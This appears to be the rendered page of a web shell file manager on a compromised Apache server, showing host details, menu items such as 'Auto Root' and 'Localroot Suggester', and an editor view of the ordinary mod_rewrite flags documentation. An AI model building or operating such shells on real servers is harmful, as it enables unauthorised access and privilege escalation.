Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
apache2-doc /
manual /
de /
rewrite /
Delete
Unzip
Name
Size
Permission
Date
Action
access.html
5.12
KB
-rw-r--r--
2026-06-12 05:08
advanced.html
5.55
KB
-rw-r--r--
2026-06-12 05:08
avoid.html
28.15
KB
-rw-r--r--
2026-06-12 05:08
flags.html
55.44
KB
-rw-r--r--
2026-06-12 05:08
htaccess.html
24.1
KB
-rw-r--r--
2026-06-12 05:08
index.html
7.69
KB
-rw-r--r--
2026-06-12 05:08
intro.html
27.13
KB
-rw-r--r--
2026-06-12 05:08
proxy.html
4.76
KB
-rw-r--r--
2026-06-12 05:08
remapping.html
39.84
KB
-rw-r--r--
2026-06-12 05:08
rewritemap.html
28.88
KB
-rw-r--r--
2026-06-12 05:08
tech.html
17.87
KB
-rw-r--r--
2026-06-12 05:08
vhosts.html
12.73
KB
-rw-r--r--
2026-06-12 05:08
Save
Rename
<!DOCTYPE html SYSTEM "about:legacy-compat"> <html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta content="width=device-width, initial-scale=1" name="viewport"> <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX This file is generated from xml source: DO NOT EDIT XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> <title>RewriteRule Flags - Apache HTTP Server Version 2.4</title> <link href="../../style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet"> <link href="../../style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size"> <link href="../../style/css/manual-print.css" rel="stylesheet" media="print" type="text/css"><link rel="stylesheet" type="text/css" href="../../style/css/prettify.css"> <script src="../../style/scripts/prettify.min.js"> </script> <link href="../../images/favicon.png" rel="shortcut icon"></head> <body id="manual-page"><div id="page-header"> <p class="menu"><a href="../mod/index.html">Modules</a> | <a href="../mod/quickreference.html">Directives</a> | <a href="https://cwiki.apache.org/confluence/display/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossary</a> | <a href="../sitemap.html">Sitemap</a> | <a href="https://bz.apache.org/bugzilla/enter_bug.cgi?product=Apache%20httpd-2">Report a bug</a></p> <p class="apache">Apache HTTP Server Version 2.4</p> <img alt="" src="../../images/feather.png"></div> <div class="up"><a href="./index.html"><img title="<-" alt="<-" src="../../images/left.gif"></a></div> <div id="path"> <a href="https://www.apache.org/">Apache</a> > <a href="https://httpd.apache.org/">HTTP Server</a> > <a href="https://httpd.apache.org/docs/">Documentation</a> > <a href="../index.html">Version 2.4</a> > <a href="./index.html">Rewrite</a></div><div id="page-content"><div id="preamble"><h1>RewriteRule Flags</h1> <button aria-label="Toggle language list" class="lang-toggle"><svg xmlns="http://www.w3.org/2000/svg" stroke-width="2" stroke="currentColor" fill="none" viewBox="0 0 24 24" height="16" width="16"><circle r="10" cy="12" cx="12"/><line y2="12" x2="22" y1="12" x1="2"/><path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"/></svg></button> <div class="toplang"> <p><span>Available Languages: </span><a href="../../en/rewrite/flags.html" title="English"> en </a> | <a href="../../fr/rewrite/flags.html" hreflang="fr" rel="alternate" title="Français"> fr </a></p> </div> <p>This document discusses the flags which are available to the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> directive, providing detailed explanations and examples.</p> </div> <div id="quickview"><ul id="toc"><li><img alt="" src="../../images/down.gif"> <a href="#introduction">Introduction</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_b">B (escape backreferences)</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_bnp">BNP|backrefnoplus (don't escape space to +)</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_bctls">BCTLS</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_bne">BNE</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_c">C|chain</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_co">CO|cookie</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_dpi">DPI|discardpath</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_e">E|env</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_end">END</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_f">F|forbidden</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_g">G|gone</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_h">H|handler</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_l">L|last</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_n">N|next</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_nc">NC|nocase</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_ne">NE|noescape</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_ns">NS|nosubreq</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_p">P|proxy</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_pt">PT|passthrough</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_qsa">QSA|qsappend</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_qsd">QSD|qsdiscard</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_qsl">QSL|qslast</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_r">R|redirect</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_s">S|skip</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_t">T|type</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_unsafe_allow_3f">UnsafeAllow3F</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_unsafe_prefix_stat">UnsafePrefixStat</a></li> <li><img alt="" src="../../images/down.gif"> <a href="#flag_unc">UNC</a></li> </ul><h3>See also</h3><ul class="seealso"><li><a href="../mod/mod_rewrite.html">Module documentation</a></li><li><a href="intro.html">mod_rewrite introduction</a></li><li><a href="remapping.html">Redirection and remapping</a></li><li><a href="htaccess.html">Per-directory Rewrites</a></li><li><a href="vhosts.html">Virtual hosts</a></li><li><a href="rewritemap.html">Using RewriteMap</a></li><li><a href="avoid.html">When not to use mod_rewrite</a></li><li><a href="tech.html">Technical details</a></li></ul></div> <div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="introduction">Introduction <a title="Permanent link" href="#introduction" class="permalink">¶</a></h2> <p>A <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> can have its behavior modified by one or more flags. Flags are included in square brackets at the end of the rule, and multiple flags are separated by commas.</p> <pre class="prettyprint lang-config">RewriteRule pattern target [Flag1,Flag2,Flag3]</pre> <p>Each flag (with a few exceptions) has a short form, such as <code>CO</code>, as well as a longer form, such as <code>cookie</code>. While it is most common to use the short form, it is recommended that you familiarize yourself with the long form, so that you remember what each flag is supposed to do. Some flags take one or more arguments. Flags are not case sensitive.</p> <p>Flags that alter metadata associated with the request (T=, H=, E=) have no effect in <a class="glossarylink" href="../glossary.html#perdirectory" title="see glossary">per-directory context</a>, when a substitution (other than '-') is performed during the same round of rewrite processing. </p> <p>Presented here are each of the available flags, along with an example of how you might use them.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_b">B (escape backreferences) <a title="Permanent link" href="#flag_b" class="permalink">¶</a></h2> <p>The [B] flag instructs <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> to escape non-alphanumeric characters before applying the transformation.</p> <p><code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> has to unescape URLs before mapping them, so backreferences are unescaped at the time they are applied. Using the B flag, non-alphanumeric characters in backreferences will be escaped. For example, consider the rule:</p> <p>For similar escaping of server variables, see the "escape" <a href="#mapfunc">mapping-function</a></p> <pre class="prettyprint lang-config">RewriteRule "^search/(.*)$" "/search.php?term=$1"</pre> <p>Given a search term of 'x & y/z', a browser will encode it as 'x%20%26%20y%2Fz', making the request 'search/x%20%26%20y%2Fz'. Without the B flag, this rewrite rule will map to 'search.php?term=x & y/z', which isn't a valid URL, and so would be encoded as <code>search.php?term=x%20&y%2Fz=</code>, which is not what was intended.</p> <p>With the B flag set on this same rule, the parameters are re-encoded before being passed on to the output URL, resulting in a correct mapping to <code>/search.php?term=x%20%26%20y%2Fz</code>.</p> <pre class="prettyprint lang-config">RewriteRule "^search/(.*)$" "/search.php?term=$1" [B,PT]</pre> <p>Note that you may also need to set <code class="directive"><a href="../mod/core.html#allowencodedslashes">AllowEncodedSlashes</a></code> to <code>On</code> to get this particular example to work, as httpd does not allow encoded slashes in URLs, and returns a 404 if it sees one.</p> <p>This escaping is particularly necessary in a proxy situation, when the backend may break if presented with an unescaped URL.</p> <p>An alternative to this flag is using a <code class="directive"><a href="../mod/mod_rewrite.html#rewritecond">RewriteCond</a></code> to capture against %{THE_REQUEST} which will capture strings in the encoded form.</p> <p>In 2.4.26 and later, you can limit the escaping to specific characters in backreferences by listing them: <code>[B=#?;]</code>. Note: The space character can be used in the list of characters to escape, but you must quote the entire third argument of <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> and the space must not be the last character in the list.</p> <pre class="prettyprint lang-config"># Escape spaces and question marks. The quotes around the final argument # are required when a space is included. RewriteRule "^search/(.*)$" "/search.php?term=$1" "[B= ?]"</pre> <p>To limit the characters escaped this way, see <a href="#flag_bne">#flag_bne</a> and <a href="#flag_bctls">#flag_bctls</a></p> <p>See <a href="tech.html#encoding">URL Encoding and Decoding</a> for a full explanation of how Apache decodes URIs before pattern matching.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_bnp">BNP|backrefnoplus (don't escape space to +) <a title="Permanent link" href="#flag_bnp" class="permalink">¶</a></h2> <p>The [BNP] flag instructs <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> to escape the space character in a backreference to %20 rather than '+'. Useful when the backreference will be used in the path component rather than the query string.</p> <pre class="prettyprint lang-config"># Escape spaces to %20 in the path instead of + as used in form submission via # the query string RewriteRule "^search/(.*)$" "/search.php/$1" "[B,BNP]"</pre> <p>This flag is available in version 2.4.26 and later.</p> <p>See <a href="tech.html#encoding">URL Encoding and Decoding</a> for background on how encoding is handled in the rewrite pipeline.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_bctls">BCTLS <a title="Permanent link" href="#flag_bctls" class="permalink">¶</a></h2> <p>The [BCTLS] flag is similar to the [B] flag, but only escapes control characters and the space character. This is the same set of characters rejected when they are copied into the query string unencoded. </p> <pre class="prettyprint lang-config"># Escape control characters and spaces RewriteRule "^search/(.*)$" "/search.php/$1" "[BCTLS]"</pre> <p>This flag is available in version 2.4.57 and later.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_bne">BNE <a title="Permanent link" href="#flag_bne" class="permalink">¶</a></h2> <p>The list of characters in [BNE=...] are treated as exclusions to the characters of the [B] or [BCTLS] flags. The listed characters will not be escaped. </p> <pre class="prettyprint lang-config"># Escape the default characters, but leave / RewriteRule "^search/(.*)$" "/search.php?term=$1" "[B,BNE=/]"</pre> <p>This flag is available in version 2.4.57 and later.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_c">C|chain <a title="Permanent link" href="#flag_c" class="permalink">¶</a></h2> <p>The [C] or [chain] flag indicates that the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> is chained to the next rule. That is, if the rule matches, then it is processed as usual and control moves on to the next rule. However, if it does not match, then the next rule, and any other rules that are chained together, are skipped.</p> <pre class="prettyprint lang-config"># Rewrite legacy product URLs to the new catalog app, # and add a tracking parameter — but only for the rewritten ones. RewriteRule "^/products/([0-9]+)$" "/catalog/item/$1" [C] RewriteRule "^/catalog/(.*)$" "/catalog/$1?via=legacy" [QSA]</pre> <p>Without the [C] flag, the second rule would also match requests that arrive at <code>/catalog/</code> directly. The chain ensures the second rule is only applied when the first rule matched.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_co">CO|cookie <a title="Permanent link" href="#flag_co" class="permalink">¶</a></h2> <p>The [CO], or [cookie] flag, allows you to set a cookie when a particular <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> matches. The argument consists of three required fields and five optional fields.</p> <p>The full syntax for the flag, including all attributes, is as follows:</p> <div class="example"><p><code> [CO=NAME:VALUE:DOMAIN:lifetime:path:secure:httponly:samesite] </code></p></div> <p>If a literal ':' character is needed in any of the cookie fields, an alternate syntax is available. To opt-in to the alternate syntax, the cookie "Name" should be preceded with a ';' character, and field separators should be specified as ';'.</p> <div class="example"><p><code> [CO=;NAME;VALUE:MOREVALUE;DOMAIN;lifetime;path;secure;httponly;samesite] </code></p></div> <p>You must declare a name, a value, and a domain for the cookie to be set.</p> <dl> <dt>Domain</dt> <dd>The domain for which you want the cookie to be valid. This may be a hostname, such as <code>www.example.com</code>, or it may be a domain, such as <code>.example.com</code>. It must be at least two parts separated by a dot. That is, it may not be merely <code>.com</code> or <code>.net</code>. Cookies of that kind are forbidden by the cookie security model.</dd> </dl> <p>You may optionally also set the following values:</p> <dl> <dt>Lifetime</dt> <dd>The time for which the cookie will persist, in minutes.</dd> <dd>A value of 0 indicates that the cookie will persist only for the current browser session. This is the default value if none is specified.</dd> <dd>A negative value causes the cookie to be unset in the browser.</dd> <dt>Path</dt> <dd>The path, on the current website, for which the cookie is valid, such as <code>/customers/</code> or <code>/files/download/</code>.</dd> <dd>By default, this is set to <code>/</code> - that is, the entire website.</dd> <dt>Secure</dt> <dd>If set to <code>secure</code>, <code>true</code>, or <code>1</code>, the cookie will only be permitted to be translated via secure (https) connections.</dd> <dt>httponly</dt> <dd>If set to <code>HttpOnly</code>, <code>true</code>, or <code>1</code>, the cookie will have the <code>HttpOnly</code> flag set, which means that the cookie is inaccessible to JavaScript code on browsers that support this feature.</dd> <dt>samesite</dt> <dd>If set to anything other than <code>false</code> or <code>0</code>, the <code>SameSite</code> attribute is set to the specified value. Typical values are <code>None</code>, <code>Lax</code>, and <code>Strict</code>. Available in 2.4.47 and later.</dd> </dl> <p>Consider this example:</p> <pre class="prettyprint lang-config">RewriteEngine On RewriteRule "^/index\.html" "-" [CO=frontdoor:yes:.example.com:1440:/]</pre> <p>In the example give, the rule doesn't rewrite the request. The "-" rewrite target tells <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> to pass the request through unchanged. Instead, it sets a cookie called 'frontdoor' to a value of 'yes'. The cookie is valid for any host in the <code>.example.com</code> domain. It is set to expire in 1440 minutes (24 hours) and is returned for all URIs.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_dpi">DPI|discardpath <a title="Permanent link" href="#flag_dpi" class="permalink">¶</a></h2> <p>The DPI flag causes the <a class="glossarylink" href="../glossary.html#pathinfo" title="see glossary">PATH_INFO</a> that was appended to the rewritten <a class="glossarylink" href="../glossary.html#urlpath" title="see glossary">URL-path</a> to be discarded.</p> <p>In <a class="glossarylink" href="../glossary.html#perdirectory" title="see glossary">per-directory context</a>, the <a class="glossarylink" href="../glossary.html#urlpath" title="see glossary">URL-path</a> each <code class="directive">RewriteRule</code> compares against is the concatenation of the current URL-path and PATH_INFO.</p> <p>The current URL-path can be the initial path as requested by the client, the result of a previous round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing, or the result of a prior rule in the current round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing.</p> <p>In contrast, the PATH_INFO that is appended to the URL-path before each rule reflects only the value of PATH_INFO before this round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing. As a consequence, if large portions of the URL-path are matched and copied into a substitution in multiple <code class="directive">RewriteRule</code> directives, without regard for which parts of the URL-path came from the current PATH_INFO, the final URL-path may have multiple copies of PATH_INFO appended to it.</p> <p>Use this flag on any substitution where the PATH_INFO that resulted from the previous mapping of this request to the filesystem is not of interest. This flag permanently forgets the PATH_INFO established before this round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing began. PATH_INFO will not be recalculated until the current round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing completes. Subsequent rules during this round of processing will see only the direct result of substitutions, without any PATH_INFO appended.</p> <pre class="prettyprint lang-config"># Request: /app/script.php/extra/path (PATH_INFO is /extra/path) # Without DPI, the substitution would see "script.php/extra/path" # and could inadvertently copy PATH_INFO into the result. RewriteRule "^script\.php(.*)$" "/new-app/handler$1" [DPI]</pre> <p>The [DPI] flag discards <code>/extra/path</code> so that only the substitution result (<code>/new-app/handler</code>) is passed to subsequent rules or the final request.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_e">E|env <a title="Permanent link" href="#flag_e" class="permalink">¶</a></h2> <p>With the [E], or [env] flag, you can set the value of an environment variable. Note that some environment variables may be set after the rule is run, thus unsetting what you have set. See <a href="../env.html">the Environment Variables document</a> for more details on how Environment variables work.</p> <p>The full syntax for this flag is:</p> <pre class="prettyprint lang-config">[E=VAR:VAL] [E=!VAR]</pre> <p><code>VAL</code> may contain backreferences (<code>$N</code> or <code>%N</code>) which are expanded.</p> <p>Using the short form</p> <div class="example"><p><code> [E=VAR] </code></p></div> <p>you can set the environment variable named <code>VAR</code> to an empty value.</p> <p>The form</p> <div class="example"><p><code> [E=!VAR] </code></p></div> <p>allows to unset a previously set environment variable named <code>VAR</code>.</p> <p>Environment variables can then be used in a variety of contexts, including CGI programs, other RewriteRule directives, or CustomLog directives.</p> <p>The following example sets an environment variable called 'image' to a value of '1' if the requested URL-path is an image file. Then, that environment variable is used to exclude those requests from the access log.</p> <pre class="prettyprint lang-config">RewriteRule "\.(png|gif|jpg)$" "-" [E=image:1] CustomLog "logs/access_log" combined env=!image</pre> <p>Note that this same effect can be obtained using <code class="directive"><a href="../mod/mod_setenvif.html#setenvif">SetEnvIf</a></code>. This technique is offered as an example, not as a recommendation.</p> <p><strong>Setting environment variables for tracking rewrites</strong></p> <p>At times, we want to maintain some kind of status when we perform a rewrite. For example, you want to make a note that you've done that rewrite, so that you can check later to see if a request came via that rewrite. One way to do this is by setting an environment variable.</p> <pre class="prettyprint lang-config">RewriteEngine on RewriteRule "^/horse/(.*)" "/pony/$1" [E=<strong>rewritten:1</strong>]</pre> <p>Later in your ruleset you might check for this environment variable using a RewriteCond:</p> <pre class="prettyprint lang-config">RewriteCond "%{ENV:rewritten}" =1</pre> <p>Note that environment variables do not survive an external redirect. You might consider using the [CO] flag to set a cookie.</p> <div class="note"><h3>REDIRECT_ prefix after internal redirects</h3> <p>In <a class="glossarylink" href="../glossary.html#perdirectory" title="see glossary">per-directory context</a>, a successful substitution triggers an internal redirect. When this happens, all environment variables set during the previous pass — including those created with <code>[E=VAR:VAL]</code> — are renamed with a <code>REDIRECT_</code> prefix. A variable you set as <code>rewritten</code> becomes <code>REDIRECT_rewritten</code> in the redirected request.</p> <p>To test for the renamed variable, reference it with the prefix:</p> </div> <pre class="prettyprint lang-config">RewriteRule "^/horses/(.*)" "/ponies/$1" [E=rewritten:1] # In the next pass, the variable has been renamed: RewriteCond "%{ENV:REDIRECT_rewritten}" =1 RewriteRule "^/ponies/(.*)" "-" [E=seen_redirect:1,L]</pre> <p>If the request is redirected multiple times, the prefix stacks: <code>REDIRECT_REDIRECT_rewritten</code>, and so on. See <a href="../env.html#redirect-vars">REDIRECT_ variables</a> for the complete description of this mechanism.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_end">END <a title="Permanent link" href="#flag_end" class="permalink">¶</a></h2> <p>Using the [END] flag terminates not only the current round of rewrite processing (like [L]) but also prevents any subsequent rewrite processing from occurring in <a class="glossarylink" href="../glossary.html#perdirectory" title="see glossary">per-directory</a> context. This makes it the preferred flag for most per-directory rules.</p> <p>In server or virtualhost context, [END] and [L] behave identically. The difference matters in per-directory context, where [L] stops the current pass but the ruleset is re-applied on the rewritten URL. This can cause infinite loops. [END] prevents all further rewrite processing, breaking the cycle.</p> <pre class="prettyprint lang-config"># In .htaccess: route all requests to a front controller # [L] would cause a loop here; [END] does not RewriteCond "%{REQUEST_FILENAME}" !-f RewriteCond "%{REQUEST_FILENAME}" !-d RewriteRule "^(.*)$" "/index.php" [END]</pre> <p>This does not apply to new requests resulting from external redirects.</p> <p>See the <a href="htaccess.html#loops">Per-directory Rewrites</a> discussion for a detailed explanation of why [L] behaves differently in per-directory context, and when [END] is the right choice.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_f">F|forbidden <a title="Permanent link" href="#flag_f" class="permalink">¶</a></h2> <p>Using the [F] flag causes the server to return a 403 Forbidden status code to the client. While the same behavior can be accomplished using the <code class="directive"><a href="../mod/mod_access_compat.html#deny">Deny</a></code> directive, this allows more flexibility in assigning a Forbidden status.</p> <p>The following rule will forbid <code>.exe</code> files from being downloaded from your server.</p> <pre class="prettyprint lang-config">RewriteRule "\.exe" "-" [F]</pre> <p>This example uses the "-" syntax for the rewrite target, which means that the requested URL-path is not modified. There's no reason to rewrite to another URL-path, if you're going to forbid the request.</p> <p>When using [F], an [L] is implied - that is, the response is returned immediately, and no further rules are evaluated.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_g">G|gone <a title="Permanent link" href="#flag_g" class="permalink">¶</a></h2> <p>The [G] flag forces the server to return a 410 Gone status with the response. This indicates that a resource used to be available, but is no longer available.</p> <p>As with the [F] flag, you will typically use the "-" syntax for the rewrite target when using the [G] flag:</p> <pre class="prettyprint lang-config">RewriteRule "oldproduct" "-" [G,NC]</pre> <p>When using [G], an [L] is implied - that is, the response is returned immediately, and no further rules are evaluated.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_h">H|handler <a title="Permanent link" href="#flag_h" class="permalink">¶</a></h2> <p>Forces the resulting request to be handled with the specified handler. For example, one might use this to force all files without a file extension to be parsed by the php handler:</p> <pre class="prettyprint lang-config">RewriteRule "!\." "-" [H=application/x-httpd-php]</pre> <p> The regular expression above - <code>!\.</code> - will match any request that does not contain the literal <code>.</code> character. </p> <p>This can be also used to force the handler based on some conditions. For example, the following snippet used in per-server context allows <code>.php</code> files to be <em>displayed</em> by <code>mod_php</code> if they are requested with the <code>.phps</code> extension:</p> <pre class="prettyprint lang-config">RewriteRule "^(/source/.+\.php)s$" "$1" [H=application/x-httpd-php-source]</pre> <p>The regular expression above - <code>^(/source/.+\.php)s$</code> - will match any request that starts with <code>/source/</code> followed by 1 or n characters followed by <code>.phps</code> literally. The backreference $1 referrers to the captured match within parenthesis of the regular expression.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_l">L|last <a title="Permanent link" href="#flag_l" class="permalink">¶</a></h2> <p>The [L] flag causes <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> to stop processing the rule set. In most contexts, this means that if the rule matches, no further rules will be processed. This corresponds to the <code>last</code> command in Perl, or the <code>break</code> command in C. Use this flag to indicate that the current rule should be applied immediately without considering further rules.</p> <p>In <a class="glossarylink" href="../glossary.html#perdirectory" title="see glossary">per-directory</a> context, [L] stops the current pass through the ruleset, but the rewritten request may be re-processed from the top — which can cause loops. Use the <a href="#flag_end">[END]</a> flag to prevent this, or see the <a href="htaccess.html#loops">Per-directory Rewrites</a> document for a full discussion of the issue and alternative solutions.</p> <p>The example given here will rewrite any request to <code>index.php</code>, giving the original request as a query string argument to <code>index.php</code>, however, the <code class="directive"><a href="../mod/mod_rewrite.html#rewritecond">RewriteCond</a></code> ensures that if the request is already for <code>index.php</code>, the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> will be skipped.</p> <pre class="prettyprint lang-config">RewriteBase "/" RewriteCond "%{REQUEST_URI}" !=/index.php RewriteRule "^(.*)" "/index.php?req=$1" [L,PT]</pre> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_n">N|next <a title="Permanent link" href="#flag_n" class="permalink">¶</a></h2> <p> The [N] flag causes the ruleset to start over again from the top, using the result of the ruleset so far as a starting point. Use with extreme caution, as it may result in loop. </p> <p> The [Next] flag could be used, for example, if you wished to replace a certain string or letter repeatedly in a request. The example shown here will replace A with B everywhere in a request, and will continue doing so until there are no more As to be replaced. </p> <pre class="prettyprint lang-config">RewriteRule "(.*)A(.*)" "$1B$2" [N]</pre> <p>You can think of this as a <code>while</code> loop: While this pattern still matches (i.e., while the URL-path still contains an <code>A</code>), perform this substitution (i.e., replace the <code>A</code> with a <code>B</code>).</p> <p>Use with extreme caution. If no termination condition is met, this flag will cause the rule to loop indefinitely. In most cases you should use [L] instead of [N], unless you truly intend iterative processing.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_nc">NC|nocase <a title="Permanent link" href="#flag_nc" class="permalink">¶</a></h2> <p>Use of the [NC] flag causes the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> to be matched in a case-insensitive manner. That is, it doesn't care whether letters appear as upper-case or lower-case in the matched URL-path.</p> <p>In the example below, any request for an image file will be proxied to your dedicated image server. The match is case-insensitive, so that <code>.jpg</code> and <code>.JPG</code> files are both acceptable, for example.</p> <pre class="prettyprint lang-config">RewriteRule "(.*\.(jpg|gif|png))$" "http://images.example.com$1" [P,NC]</pre> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_ne">NE|noescape <a title="Permanent link" href="#flag_ne" class="permalink">¶</a></h2> <p>By default, when a <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> results in an external redirect, any characters in the output that are not in the following safe set will be converted to their hexcode (percent-encoded) equivalents:</p> <ul> <li>Alphanumeric characters: <code>A-Z</code>, <code>a-z</code>, <code>0-9</code></li> <li>Special characters: <code>$-_.+!*'(),:;@&=/~</code></li> </ul> <p>For example, <code>#</code> would be converted to <code>%23</code>, and <code>?</code> to <code>%3F</code>. The <code>%</code> character is also escaped (to <code>%25</code>), which means that any percent-encoding already present in the substitution will be double-encoded.</p> <p>Using the [NE] flag prevents this escaping, allowing characters such as <code>#</code> and <code>?</code> to pass through to the redirect URL unmodified.</p> <pre class="prettyprint lang-config">RewriteRule "^/anchor/(.+)" "/bigpage.html#$1" [NE,R]</pre> <p> The above example will redirect <code>/anchor/xyz</code> to <code>/bigpage.html#xyz</code>. Omitting the [NE] will result in the # being converted to its hexcode equivalent, <code>%23</code>, which will then result in a 404 Not Found error condition. </p> <p>See <a href="tech.html#encoding">URL Encoding and Decoding</a> for the full picture of how Apache encodes and decodes URIs during rewriting.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_ns">NS|nosubreq <a title="Permanent link" href="#flag_ns" class="permalink">¶</a></h2> <p>Use of the [NS] flag prevents the rule from being used on subrequests. For example, a page which is included using an SSI (Server Side Include) is a subrequest, and you may want to avoid rewrites happening on those subrequests. Also, when <code class="module"><a href="../mod/mod_dir.html">mod_dir</a></code> tries to find out information about possible directory default files (such as <code>index.html</code> files), this is an internal subrequest, and you often want to avoid rewrites on such subrequests. On subrequests, it is not always useful, and can even cause errors, if the complete set of rules are applied. Use this flag to exclude problematic rules.</p> <p>To decide whether or not to use this rule: if you prefix URLs with CGI-scripts, to force them to be processed by the CGI-script, it's likely that you will run into problems (or significant overhead) on sub-requests. In these cases, use this flag.</p> <p> Images, javascript files, or css files, loaded as part of an HTML page, are not subrequests - the browser requests them as separate HTTP requests. </p> <pre class="prettyprint lang-config"># Only rewrite direct requests to the front controller, # not subrequests from SSI includes or mod_dir. RewriteCond "%{REQUEST_FILENAME}" !-f RewriteCond "%{REQUEST_FILENAME}" !-d RewriteRule "^(.*)$" "/app/index.php?page=$1" [NS,L]</pre> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_p">P|proxy <a title="Permanent link" href="#flag_p" class="permalink">¶</a></h2> <p>Use of the [P] flag causes the request to be handled by <code class="module"><a href="../mod/mod_proxy.html">mod_proxy</a></code>, and handled via a proxy request. For example, if you wanted all image requests to be handled by a back-end image server, you might do something like the following:</p> <pre class="prettyprint lang-config">RewriteRule "/(.*)\.(jpg|gif|png)$" "http://images.example.com/$1.$2" [P]</pre> <p>Use of the [P] flag implies [L] - that is, the request is immediately pushed through the proxy, and any following rules will not be considered.</p> 